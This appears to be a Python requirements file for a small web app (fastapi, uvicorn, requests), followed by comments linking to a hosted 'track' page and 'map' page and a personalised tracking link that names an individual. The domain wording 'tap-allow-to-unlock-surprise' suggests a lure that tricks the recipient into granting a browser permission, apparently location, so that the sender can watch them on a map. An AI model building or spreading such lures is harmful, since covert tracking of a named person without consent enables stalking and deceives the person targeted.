fastapi
uvicorn
requests


#friend := https://tap-allow-to-unlock-surprise.onrender.com/track.html
# map := https://tap-allow-to-unlock-surprise.onrender.com/map.html


https://tap-allow-to-unlock-surprise.onrender.com/track.html?user=Vaishali%20Ghoghari
